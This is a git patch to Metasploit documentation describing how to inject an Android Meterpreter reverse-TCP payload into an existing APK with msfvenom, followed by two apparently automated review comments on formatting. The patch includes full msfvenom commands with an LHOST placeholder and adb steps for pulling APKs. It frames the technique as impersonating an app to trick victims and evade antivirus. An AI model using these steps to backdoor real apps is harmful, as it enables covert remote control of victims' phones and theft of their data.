From 7fe41f5e4e9a2cd851b70c2feb5b41b0bb0a48c0 Mon Sep 17 00:00:00 2001 From: Tim W Date: Tue, 3 Jul 2018 15:20:18 +0800 Subject: [PATCH] fix #10187, add documentation for APK injection --- .../payload/android/meterpreter/injection.md | 51 +++++++++++++++++++ .../android/meterpreter/reverse_tcp.md | 9 ++-- 2 files changed, 57 insertions(+), 3 deletions(-) create mode 100644 documentation/modules/payload/android/meterpreter/injection.md diff --git a/documentation/modules/payload/android/meterpreter/injection.md b/documentation/modules/payload/android/meterpreter/injection.md new file mode 100644 index 0000000000..bf8e409a4a --- /dev/null +++ b/documentation/modules/payload/android/meterpreter/injection.md 
@@ -0,0 +1,51 @@ +You can inject the Android Meterpreter into an existing APK using msfvenom. This +will allow you to impersonate an existing application, which may make it easier +to convince your victim to install the APK. + +## Vulnerable Application + +It should be possible to inject Meterpreter into any APK, however some applications +have complex resource structures which may not work with `apktool`. +Additionally some applications have security measures that prevent the application +from working as expected once it has been modified. + +**Finding APKs** + +There are many websites that provide standalone APK that can be downloaded, e.g: +APKPure, APKMirror, RAW APK. +You can also build a simple application yourself with Android Studio. + +Additionally you can pull APKs from a device connected via ADB: + +``` +$ adb shell pm list packages | grep app +package:com.existing.app +$ adb shell pm path com.existing.app +package:/data/app/com.existing.app-1/base.apk +$ adb pull /data/app/com.existing.app-1/base.apk com.existing.apk +[100%] /data/app/com.existing.app-1/base.apk +``` + +## Requirements + +APK Injection (as opposed to generating a single APK payload) requires a few tools +to be present on your command line already: + +* [Apktool](https://ibotpeaches.github.io/Apktool/) - Used for rebuilding the APK +* [keytool](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html) - To create and extract signing certificates +* [jarsigner](https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jarsigner.html) - To re-sign the APK + +Installing these tools (if they are not installed already) will depend on your OS. +Apktool can be installed manually or automatically (e.g `brew install apktool`). +keytool and jarsigner can be installed by installing the appropriate JDK. 
+ +## Verification Steps + +``` +./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk +``` + +Next, start an Android device. Upload the APK, and execute it, as you would with +a [normal Android meterpreter APK](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md). + + diff --git a/documentation/modules/payload/android/meterpreter/reverse_tcp.md b/documentation/modules/payload/android/meterpreter/reverse_tcp.md index 849d892714..7d1cfe737e 100644 --- a/documentation/modules/payload/android/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/android/meterpreter/reverse_tcp.md @@ -41,21 +41,24 @@ msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk msf payload(reverse_tcp) > ``` -To create the APK with msfvenom: +### To create the APK with msfvenom: ``` ./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk ``` +### To inject meterpreter into an existing APK with msfvenom: + You can also add Android meterpreter to any existing APK. This will make it harder for Anti-virus software to detect the payload, and allow you read internal files and take -screenshots of the Android app you are backdooring: - +screenshots of the Android app that you are backdooring: ``` ./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk ``` +[Please see here for more documentation on Android injection](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/injection.md). + Next, start an Android device. Upload the APK, and execute it. There are different ways to do this, so please refer to the Scenarios section for more information.
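Review bot: In the new injection.md the section structure is inconsistent: `## Vulnerable Application`, `## Requirements` and `## Verification Steps` follow the module-documentation heading style, but the "Finding APKs" subsection is emitted as bold text (`**Finding APKs**`) rather than a `###` heading, so it will not show up in the rendered outline; make it `### Finding APKs`. Small wording fixes in the same hunk: "standalone APK that can be downloaded, e.g:" should read "standalone APKs that can be downloaded, e.g." and "(e.g `brew install apktool`)" is missing the period after "e.g."; the comma splice "any APK, however some applications" reads better as "any APK; however, some applications". The Vulnerable Application paragraph says some applications "have security measures that prevent the application from working as expected once it has been modified" without saying what those measures are, while the Requirements list states that jarsigner is needed "To re-sign the APK"; tying the two together (the rebuilt APK no longer carries the original developer's signing certificate, so an application that verifies its own signature will notice the change) would tell readers which applications the caveat applies to and why `apktool` alone is not enough.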
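Review bot: In the reverse_tcp.md hunk, both new `###` headings end with a colon ("### To create the APK with msfvenom:" and "### To inject meterpreter into an existing APK with msfvenom:"), which the file's existing headings do not, and the second heading merely restates the sentence that follows it; drop the colons and consider "### Creating the APK with msfvenom" and "### Injecting Meterpreter into an existing APK". The hunk also deletes the blank line between "screenshots of the Android app that you are backdooring:" and the opening ``` fence, whereas the first msfvenom block in the same region keeps a blank line before its fence; restore it so both blocks are laid out the same way. The added cross-reference links to the absolute `master` URL on GitHub with "Please see here" as link text; a relative link such as `[Android APK injection](injection.md)` keeps working on forks and branches and gives the link a descriptive name.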